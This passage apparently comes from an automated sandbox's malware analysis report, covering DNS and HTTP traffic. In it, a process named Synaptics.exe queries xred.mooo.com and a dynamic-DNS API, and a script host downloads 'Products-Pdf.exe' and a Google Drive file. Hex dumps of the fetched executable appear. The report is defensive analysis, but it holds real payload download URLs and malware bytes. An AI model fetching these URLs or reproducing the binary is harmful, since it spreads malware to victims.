                                                                                                                                                                                    Dec 30, 2024 11:51:05.809252977 CET192.168.2.41.1.1.10x1ad8Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:11.922426939 CET192.168.2.41.1.1.10xec48Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:18.607368946 CET192.168.2.41.1.1.10x6a9Standard query (0)206.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:49.690510988 CET192.168.2.41.1.1.10xa381Standard query (0)docs.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:50.463603973 CET192.168.2.41.1.1.10x6711Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:50.480598927 CET192.168.2.41.1.1.10xa025Standard query (0)freedns.afraid.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:50.722320080 CET192.168.2.41.1.1.10x112fStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:56.712852001 CET192.168.2.41.1.1.10xcebfStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:52:03.791120052 CET192.168.2.41.1.1.10xc87Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:52:10.619386911 CET192.168.2.41.1.1.10xd48aStandard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:52:17.434572935 CET192.168.2.41.1.1.10x7a67Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:52:21.979717970 CET192.168.2.41.1.1.10x6fc8Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:52:27.681797981 CET192.168.2.41.1.1.10x6f34Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:52:34.512938023 CET192.168.2.41.1.1.10x32e3Standard query (0)xred.mooo.comA (IP address)IN (0x0001)false

                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                    Dec 30, 2024 11:50:48.885637045 CET1.1.1.1192.168.2.40x497No error (0)filedn.com23.109.93.100A (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:00.450119019 CET1.1.1.1192.168.2.40x31c3No error (0)docs.google.com142.250.185.206A (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:01.381278992 CET1.1.1.1192.168.2.40xb8eeName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:01.751761913 CET1.1.1.1192.168.2.40xe6c4No error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:01.803744078 CET1.1.1.1192.168.2.40x534aNo error (0)drive.usercontent.google.com142.250.186.33A (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:05.817011118 CET1.1.1.1192.168.2.40x1ad8Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:11.930007935 CET1.1.1.1192.168.2.40xec48Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:18.614425898 CET1.1.1.1192.168.2.40x6a9Name error (3)206.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:44.111183882 CET1.1.1.1192.168.2.40x5310No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:44.111183882 CET1.1.1.1192.168.2.40x5310No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:49.697319984 CET1.1.1.1192.168.2.40xa381No error (0)docs.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:50.471488953 CET1.1.1.1192.168.2.40x6711Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:50.487731934 CET1.1.1.1192.168.2.40xa025No error (0)freedns.afraid.org69.42.215.252A (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:50.729662895 CET1.1.1.1192.168.2.40x112fNo error (0)drive.usercontent.google.com142.250.185.193A (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:51:56.720623016 CET1.1.1.1192.168.2.40xcebfName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:52:03.798474073 CET1.1.1.1192.168.2.40xc87Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:52:10.626672029 CET1.1.1.1192.168.2.40xd48aName error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:52:17.442625999 CET1.1.1.1192.168.2.40x7a67Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:52:21.986757994 CET1.1.1.1192.168.2.40x6fc8Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:52:27.689008951 CET1.1.1.1192.168.2.40x6f34Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                    Dec 30, 2024 11:52:34.520215988 CET1.1.1.1192.168.2.40x32e3Name error (3)xred.mooo.comnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                    • filedn.com
                                                                                                                                                                                    • docs.google.com
                                                                                                                                                                                    • drive.usercontent.google.com
                                                                                                                                                                                    • freedns.afraid.org

                                                                                                                                                                                    HTTP Packets

                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    0192.168.2.44974069.42.215.252805016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    Dec 30, 2024 11:51:01.781053066 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                                                                                    User-Agent: MyApp
                                                                                                                                                                                    Host: freedns.afraid.org
                                                                                                                                                                                    Cache-Control: no-cache


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    1192.168.2.44977669.42.215.252805016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    Dec 30, 2024 11:51:06.980257034 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                                                                                    User-Agent: MyApp
                                                                                                                                                                                    Host: freedns.afraid.org
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Dec 30, 2024 11:51:09.623456955 CET243INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:09 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    X-Cache: MISS
                                                                                                                                                                                    Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    2192.168.2.45192669.42.215.252807924C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    Dec 30, 2024 11:51:50.494656086 CET154OUTGET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1
                                                                                                                                                                                    User-Agent: MyApp
                                                                                                                                                                                    Host: freedns.afraid.org
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Dec 30, 2024 11:51:51.073899031 CET243INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:50 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    X-Cache: MISS
                                                                                                                                                                                    Data Raw: 31 66 0d 0a 45 52 52 4f 52 3a 20 43 6f 75 6c 64 20 6e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 2e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                    Data Ascii: 1fERROR: Could not authenticate.0


                                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    0192.168.2.44973023.109.93.1004437132C:\Windows\System32\wscript.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:50:49 UTC354OUTGET /lp8FEqN2c8WurlGY9Azex17/Products-Pdf.exe HTTP/1.1
                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                    Accept-Language: en-ch
                                                                                                                                                                                    UA-CPU: AMD64
                                                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                    Host: filedn.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2024-12-30 10:50:50 UTC348INHTTP/1.1 200 OK
                                                                                                                                                                                    Server: CacheHTTPd v1.0
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:50:49 +0000
                                                                                                                                                                                    Content-Type: application/x-msdos-program
                                                                                                                                                                                    Content-Length: 2203648
                                                                                                                                                                                    Etag: "c3baca74097be7c18f77b21066bdb47a2dc5b769"
                                                                                                                                                                                    Expires: Mon, 30 Dec 2024 16:50:49 +0000
                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                    Content-Transfer-Encoding: binary
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    Keep-Alive: timeout=30
                                                                                                                                                                                    2024-12-30 10:50:50 UTC4096INData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                    Data Ascii: MZP@!L!This program must be run under Win32$7
                                                                                                                                                                                    2024-12-30 10:50:50 UTC4096INData Raw: ff ff a1 e4 e5 49 00 85 c0 75 e9 33 c0 5a 59 59 64 89 10 68 3d 1c 40 00 80 3d 4d e0 49 00 00 74 0a 68 cc e5 49 00 e8 d5 f7 ff ff 68 cc e5 49 00 e8 d3 f7 ff ff c3 e9 05 27 00 00 eb db 5b 5d c3 53 3b 05 18 e6 49 00 75 09 8b 50 04 89 15 18 e6 49 00 8b 50 04 8b 48 08 81 f9 00 10 00 00 7f 38 3b c2 75 17 85 c9 79 03 83 c1 03 c1 f9 02 a1 24 e6 49 00 33 d2 89 54 88 f4 eb 24 85 c9 79 03 83 c1 03 c1 f9 02 8b 1d 24 e6 49 00 89 54 8b f4 8b 00 89 02 89 50 04 5b c3 8b 00 89 02 89 50 04 5b c3 8d 40 00 8b 15 28 e6 49 00 eb 10 8b 4a 08 3b c1 72 07 03 4a 0c 3b c1 72 16 8b 12 81 fa 28 e6 49 00 75 e8 c7 05 c8 e5 49 00 03 00 00 00 33 d2 8b c2 c3 90 53 8b ca 83 e9 04 8d 1c 01 83 fa 10 7c 0f c7 03 07 00 00 80 8b d1 e8 b9 01 00 00 5b c3 83 fa 04 7c 0c 8b ca 81 c9 02 00 00 80 89
                                                                                                                                                                                    Data Ascii: Iu3ZYYdh=@=MIthIhI'[]S;IuPIPH8;uy$I3T$y$ITP[P[@(IJ;rJ;r(IuI3S|[|
                                                                                                                                                                                    2024-12-30 10:50:50 UTC4096INData Raw: 49 00 db e2 d9 2d 24 b0 49 00 c3 90 6a 00 d9 3c 24 58 c3 90 83 ec 08 df 3c 24 9b 58 5a c3 8b c0 83 ec 0c d9 3c 24 d9 7c 24 02 9b 66 81 4c 24 02 00 0f d9 6c 24 02 df 7c 24 04 9b d9 2c 24 59 58 5a c3 8b c0 83 3d 2c e0 49 00 00 74 06 ff 15 2c e0 49 00 b8 d2 00 00 00 e9 d3 1c 00 00 c3 8b c0 53 56 8b f2 8b d8 66 8b 43 04 66 3d b0 d7 72 06 66 3d b3 d7 76 07 bb 66 00 00 00 eb 2b 66 3d b0 d7 74 07 8b c3 e8 02 04 00 00 66 89 73 04 80 7b 48 00 75 0d 83 7b 18 00 75 07 c7 43 18 70 2d 40 00 8b c3 ff 53 18 8b d8 85 db 74 07 8b c3 e8 31 fc ff ff 8b c3 5e 5b c3 66 ba b1 d7 e8 9f ff ff ff c3 8b c0 53 8b d8 33 c0 89 43 10 33 c0 89 43 0c 6a 00 8d 43 10 50 8b 43 08 50 8b 43 14 50 8b 03 50 e8 6d e5 ff ff 85 c0 75 0e e8 e4 e5 ff ff 83 f8 6d 75 06 33 c0 5b c3 33 c0 5b c3 8d 40
                                                                                                                                                                                    Data Ascii: I-$Ij<$X<$XZ<$|$fL$l$|$,$YXZ=,It,ISVfCf=rf=vf+f=tfs{Hu{uCp-@St1^[fS3C3CjCPCPCPPmumu3[3[@
                                                                                                                                                                                    2024-12-30 10:50:50 UTC4096INData Raw: 8b 4b d8 31 c0 51 c1 e9 02 49 f3 ab 59 83 e1 03 f3 aa 89 d0 89 e2 8b 4b b8 85 c9 74 01 51 8b 5b dc 85 db 74 04 8b 1b eb ed 39 d4 74 1d 5b 8b 0b 83 c3 04 8b 73 10 85 f6 74 06 8b 7b 14 89 34 07 83 c3 1c 49 75 ed 39 d4 75 e3 5f 5e 5b c3 8b c0 53 56 89 c3 89 c6 8b 36 8b 56 c0 8b 76 dc 85 d2 74 07 e8 15 18 00 00 89 d8 85 f6 75 e9 5e 5b c3 87 d1 81 f9 00 00 00 ff 73 11 81 f9 00 00 00 fe 72 07 0f bf c9 03 08 ff 21 ff e1 81 e1 ff ff ff 00 01 c1 89 d0 8b 11 e9 28 29 00 00 c3 8d 40 00 55 8b ec 83 c4 f8 53 56 57 33 db 89 5d f8 8b f1 89 55 fc 8b f8 33 c0 55 68 24 3d 40 00 64 ff 30 64 89 20 33 c0 89 06 8b 55 fc 8b 07 e8 63 00 00 00 8b d8 85 db 74 31 8b 43 14 85 c0 74 13 03 f8 89 3e 83 3e 00 74 21 8b 06 50 8b 00 ff 50 04 eb 17 8d 4d f8 8b 53 18 8b c7 e8 72 ff ff ff 8b
                                                                                                                                                                                    Data Ascii: K1QIYKtQ[t9t[st{4Iu9u_^[SV6Vvtu^[sr!()@USVW3]U3Uh$=@d0d 3Uct1Ct>>t!PPMSr
                                                                                                                                                                                    2024-12-30 10:50:50 UTC4096INData Raw: 66 3b 4a 06 74 05 83 c2 08 eb e4 83 c2 02 83 c2 02 83 c2 02 89 d1 5a 29 d1 d1 e9 e9 fc fe ff ff c3 8d 40 00 31 c9 8a 0a 42 e9 82 fe ff ff c3 90 57 50 51 89 d7 31 c0 f2 ae 75 02 f7 d1 58 01 c1 58 5f e9 69 fe ff ff c3 31 c9 85 d2 74 05 8b 4a fc d1 e9 e9 c4 fe ff ff c3 8d 40 00 53 85 d2 74 18 8b 5a fc 85 db 74 11 39 d9 7c 02 89 d9 88 08 40 92 e8 65 dd ff ff 5b c3 c6 00 00 5b c3 8b c0 85 c0 74 03 8b 40 fc c3 85 d2 74 3f 8b 08 85 c9 0f 84 7e fd ff ff 53 56 57 89 c3 89 d6 8b 79 fc 8b 56 fc 01 fa 39 ce 74 17 e8 5e 03 00 00 89 f0 8b 4e fc 8b 13 01 fa e8 20 dd ff ff 5f 5e 5b c3 e8 47 03 00 00 8b 03 89 f9 eb e8 c3 85 d2 74 61 85 c9 0f 84 3c fd ff ff 3b 10 74 5c 3b 08 74 0e 50 51 e8 2d fd ff ff 5a 58 e9 9a ff ff ff 53 56 57 89 d3 89 ce 50 8b 43 fc 03 46 fc e8 83 fd
                                                                                                                                                                                    Data Ascii: f;JtZ)@1BWPQ1uXX_i1tJ@StZt9|@e[[t@t?~SVWyV9t^N _^[Gta<;t\;tPQ-ZXSVWPCF
                                                                                                                                                                                    2024-12-30 10:50:50 UTC4096INData Raw: 24 14 0f a4 c2 04 c1 e0 04 03 04 24 13 54 24 04 83 c4 08 89 44 24 08 89 54 24 0c 45 33 db e9 66 ff ff ff 80 7c 24 10 00 0f 84 d3 00 00 00 8b 44 24 08 8b 54 24 0c f7 d8 83 d2 00 f7 da 89 44 24 08 89 54 24 0c e9 b7 00 00 00 8a 44 2e ff 8b d0 80 c2 d0 80 ea 0a 73 62 8b f8 81 e7 ff 00 00 00 83 ef 30 83 7c 24 0c 00 75 09 83 7c 24 08 00 72 49 eb 02 7c 45 81 7c 24 0c cc cc cc 0c 75 0c 81 7c 24 08 cc cc cc cc 76 04 eb 2f 7f 2d 6a 00 6a 0a 8b 44 24 10 8b 54 24 14 e8 02 fd ff ff 52 50 8b c7 99 03 04 24 13 54 24 04 83 c4 08 89 44 24 08 89 54 24 0c 45 33 db eb 90 80 7c 24 10 00 74 17 8b 44 24 08 8b 54 24 0c f7 d8 83 d2 00 f7 da 89 44 24 08 89 54 24 0c 83 7c 24 0c 00 75 05 83 7c 24 08 00 74 1b 83 7c 24 0c 00 75 0a 83 7c 24 08 00 0f 92 c0 eb 03 0f 9c c0 3a 44 24 10 74
                                                                                                                                                                                    Data Ascii: $$T$D$T$E3f|$D$T$D$T$D.sb0|$u|$rI|E|$u|$v/-jjD$T$RP$T$D$T$E3|$tD$T$D$T$|$u|$t|$u|$:D$t
                                                                                                                                                                                    2024-12-30 10:50:50 UTC4096INData Raw: 00 e8 a6 a7 ff ff a3 3c e0 49 00 e8 84 a7 ff ff 25 00 00 00 80 3d 00 00 00 80 74 2d e8 73 a7 ff ff 25 ff 00 00 00 66 83 f8 04 76 0c c7 05 c0 e5 49 00 03 00 00 00 eb 20 e8 c7 a6 ff ff e8 86 fe ff ff a3 c0 e5 49 00 eb 0f e8 b6 a6 ff ff e8 75 fe ff ff a3 c0 e5 49 00 e8 2f a7 ff ff a3 34 e0 49 00 c3 90 ff 25 d0 02 4a 00 8b c0 ff 25 cc 02 4a 00 8b c0 ff 25 c8 02 4a 00 8b c0 ff 25 c4 02 4a 00 8b c0 50 6a 40 e8 e0 ff ff ff c3 8d 40 00 b8 10 00 00 00 c3 8b c0 53 e8 f2 ff ff ff 8b d8 85 db 74 36 83 3d c4 b0 49 00 ff 75 0a b8 e2 00 00 00 e8 79 dc ff ff 8b c3 e8 c6 ff ff ff 85 c0 75 0c b8 e2 00 00 00 e8 64 dc ff ff eb 0c 50 a1 c4 b0 49 00 50 e8 a2 ff ff ff 5b c3 8a 0d 64 e6 49 00 a1 c4 b0 49 00 84 c9 75 26 64 8b 15 2c 00 00 00 8b 04 82 c3 e8 9d ff ff ff a1 c4 b0 49
                                                                                                                                                                                    Data Ascii: <I%=t-s%fvI IuI/4I%J%J%J%JPj@@St6=IuyudPIP[dIIu&d,I
                                                                                                                                                                                    2024-12-30 10:50:50 UTC4096INData Raw: 4d 53 47 00 4d 53 48 5f 57 48 45 45 4c 53 55 50 50 4f 52 54 5f 4d 53 47 00 00 00 00 4d 53 48 5f 53 43 52 4f 4c 4c 5f 4c 49 4e 45 53 5f 4d 53 47 00 00 00 00 55 8b ec 33 c0 55 68 59 7c 40 00 64 ff 30 64 89 20 ff 05 78 e6 49 00 33 c0 5a 59 59 64 89 10 68 60 7c 40 00 c3 e9 e2 c6 ff ff eb f8 5d c3 8b c0 83 2d 78 e6 49 00 01 c3 55 8b ec 33 c0 55 68 91 7c 40 00 64 ff 30 64 89 20 ff 05 7c e6 49 00 33 c0 5a 59 59 64 89 10 68 98 7c 40 00 c3 e9 aa c6 ff ff eb f8 5d c3 8b c0 83 2d 7c e6 49 00 01 c3 68 e6 49 00 f0 ff 00 00 68 e6 49 00 f1 ff 00 00 68 e6 49 00 f2 ff 00 00 68 e6 49 00 f3 ff 00 00 68 e6 49 00 f4 ff 00 00 68 e6 49 00 f5 ff 00 00 68 e6 49 00 f6 ff 00 00 68 e6 49 00 f7 ff 00 00 68 e6 49 00 f8 ff 00 00 68 e6 49 00 f9 ff 00 00 68 e6 49 00 fa ff 00 00 68 e6 49
                                                                                                                                                                                    Data Ascii: MSGMSH_WHEELSUPPORT_MSGMSH_SCROLL_LINES_MSGU3UhY|@d0d xI3ZYYdh`|@]-xIU3Uh|@d0d |I3ZYYdh|@]-|IhIhIhIhIhIhIhIhIhIhIhIhI
                                                                                                                                                                                    2024-12-30 10:50:50 UTC4096INData Raw: 34 3e 40 00 2c 66 40 00 38 66 40 00 48 3e 40 00 3c 3e 40 00 48 66 40 00 a0 3b 40 00 ac ea 40 00 24 54 4d 75 6c 74 69 52 65 61 64 45 78 63 6c 75 73 69 76 65 57 72 69 74 65 53 79 6e 63 68 72 6f 6e 69 7a 65 72 8d 40 00 55 8b ec 53 89 d3 89 c2 c1 ea 10 66 f7 f3 8b 5d 08 66 89 01 66 89 13 5b 5d c2 04 00 53 8b d8 8b cb b2 01 a1 b0 86 40 00 e8 8b 45 00 00 e8 fe b6 ff ff 5b c3 53 56 57 8b f9 8b f2 8b d8 56 57 8b cb b2 01 a1 b0 86 40 00 e8 a7 45 00 00 e8 de b6 ff ff 5f 5e 5b c3 8b c0 ff 25 4c 08 4a 00 8b c0 55 8b ec 83 c4 f4 53 56 33 c9 89 4d fc 8b f2 8b d8 33 c0 55 68 15 8d 40 00 64 ff 30 64 89 20 56 8d 45 fc 8b d3 e8 1a c5 ff ff 8b 45 fc e8 22 c5 ff ff 50 e8 c0 ff ff ff e8 4f ed ff ff 85 c0 75 16 89 5d f4 c6 45 f8 0b 8d 55 f4 a1 d0 dc 49 00 33 c9 e8 7d ff ff ff
                                                                                                                                                                                    Data Ascii: 4>@,f@8f@H>@<>@Hf@;@@$TMultiReadExclusiveWriteSynchronizer@USf]ff[]S@E[SVWVW@E_^[%LJUSV3M3Uh@d0d VEE"POu]EUI3}
                                                                                                                                                                                    2024-12-30 10:50:50 UTC4096INData Raw: e8 3b 3f 00 00 3c 02 74 f2 8d 44 1e ff 5e 5b c3 33 c0 5e 5b c3 8d 40 00 53 56 57 55 8b f2 8b d8 8b c6 e8 59 b0 ff ff 8b f8 8b c3 e8 50 b2 ff ff 8b e8 85 ff 7e 28 8a 5c 3e ff 84 db 74 1b 8b d3 8b c5 e8 c5 04 00 00 85 c0 74 0e 8b d7 8b c6 e8 ec 3e 00 00 3c 02 75 06 4f 4f 85 ff 7f d8 8b c7 5d 5f 5e 5b c3 8d 40 00 55 8b ec 83 c4 f8 53 56 57 33 db 89 5d f8 89 4d fc 8b fa 8b f0 33 c0 55 68 df 9c 40 00 64 ff 30 64 89 20 8b d6 b8 f8 9c 40 00 e8 81 ff ff ff 8b d8 85 db 74 07 80 7c 1e ff 2e 74 05 bb ff ff ff 7f 8d 45 f8 50 8b cb 49 ba 01 00 00 00 8b c6 e8 24 b2 ff ff 8b 55 f8 8b 45 fc 8b cf e8 03 b0 ff ff 33 c0 5a 59 59 64 89 10 68 e6 9c 40 00 8d 45 f8 e8 e2 ac ff ff c3 e9 5c a6 ff ff eb f0 5f 5e 5b 59 59 5d c3 00 00 00 ff ff ff ff 03 00 00 00 2e 5c 3a 00 53 56 57
                                                                                                                                                                                    Data Ascii: ;?<tD^[3^[@SVWUYP~(\>tt><uOO]_^[@USVW3]M3Uh@d0d @t|.tEPI$UE3ZYYdh@E\_^[YY].\:SVW


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    1192.168.2.449737142.250.185.2064435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:01 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-30 10:51:01 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:01 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-kb4SIOgNbCS8Z_YkLBoUbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    2192.168.2.449736142.250.185.2064435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:01 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-30 10:51:01 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:01 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-G7i8XRydY2u8nsU3i0Oxgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
